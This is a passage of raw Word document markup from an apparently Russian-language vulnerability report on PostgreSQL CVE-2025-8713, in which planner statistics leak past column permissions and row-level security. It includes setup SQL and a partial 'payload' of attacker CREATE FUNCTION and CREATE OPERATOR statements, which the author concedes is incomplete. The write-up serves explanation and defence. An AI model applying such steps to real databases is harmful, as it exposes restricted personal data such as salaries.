          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17.4 Optimizer stats обходят ACL и RLS (R26, CVE-2025-8713)</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PostgreSQL query planner использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">column statistics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pg_statistic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для оценки selectivity предикатов — это включает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histogram_bounds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n_distinct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Эти статистики собираются </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALYZE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и хранятся per-column. В PostgreSQL до 17.6/16.10/15.14/14.19/13.22 (фикс 14.08.2025) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">custom operator может на этапе planning читать содержимое most_common_vals чужих колонок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, обходя как ACL (нет SELECT-разрешения на колонку), так и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS-policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (фильтр на rows не применяется к statistics-pool).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-8713 — отдельная CVE от связанной CVE-2024-4317 (R17, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stats_ext.most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> leak): CVE-2024-4317 leak через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">view permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, CVE-2025-8713 — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">custom operator на planning-этапе</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что более общий vector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий создаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">custom operator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с restrict/join estimator-function, которая читает statistics через optimizer-API, и применяет этот operator в WHERE на таблицу с RLS или с restrictive ACL. Estimator-функция выполняется на planning-этапе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до проверки policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — она получает доступ к pg_statistic entries (которые содержат actual data samples из чужих rows). Leak — выборки конкретных values, обычно top-K most common values для целевой колонки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий не уязвимый код — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уязвимая среда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG до фикса) + атакующий с правом CREATE OPERATOR. Сценарий:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Setup БД с защищённой таблицей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE app.salaries (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    employee_id int PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    department text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    annual_salary numeric NOT NULL</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ACL: только HR имеет SELECT на annual_salary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SELECT (employee_id, department) ON app.salaries TO public;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SELECT (annual_salary) ON app.salaries TO hr_role;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ИЛИ RLS-эквивалент:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE app.salaries ENABLE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CREATE POLICY only_own ON app.salaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (employee_id = current_setting('app.employee_id')::int);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Атакующий имеет access как обычный пользователь:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- - SELECT (employee_id, department), но не SELECT (annual_salary).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- - ИЛИ может прочитать только свои rows через RLS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для CVE-2025-8713 атакующий также нуждается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE на schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для CREATE OPERATOR/CREATE FUNCTION), что в PG 15+ для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schema по умолчанию REVOKE-нут, но для tenant-schemas обычно дан.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — extraction most_common_vals через custom operator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий создаёт estimator function:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Атакующий создаёт функцию-приёмник, которая получает stats и логирует</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION attacker.peek_stats(internal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS internal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE C STRICT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AS '$libdir/postgres', 'restriction_selectivity';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ В реальной CVE-2025-8713 эксплуатации используется custom estimator,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- но C-language требует superuser. Для realistic exploit на user-роль</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- используется plpgsql-обёртка над встроенными estimator-functions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- или другой механизм доступа к pg_statistic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В реальной CVE-2025-8713 эксплуатации path сложнее — требует комбинации custom operator с estimator который leaks данные через side-channel (timing или error messages). GBHackers article (R26 source) описывает high-level vector без full PoC, который в open-disclosure не опубликован.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий создаёт custom operator на target column:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Custom operator на колонку annual_salary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OPERATOR @@@ (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    LEFTARG = numeric,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RIGHTARG = numeric,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FUNCTION = attacker.peek_stats,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RESTRICT = attacker.leaky_estimator,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    JOIN = attacker.leaky_estimator</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bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
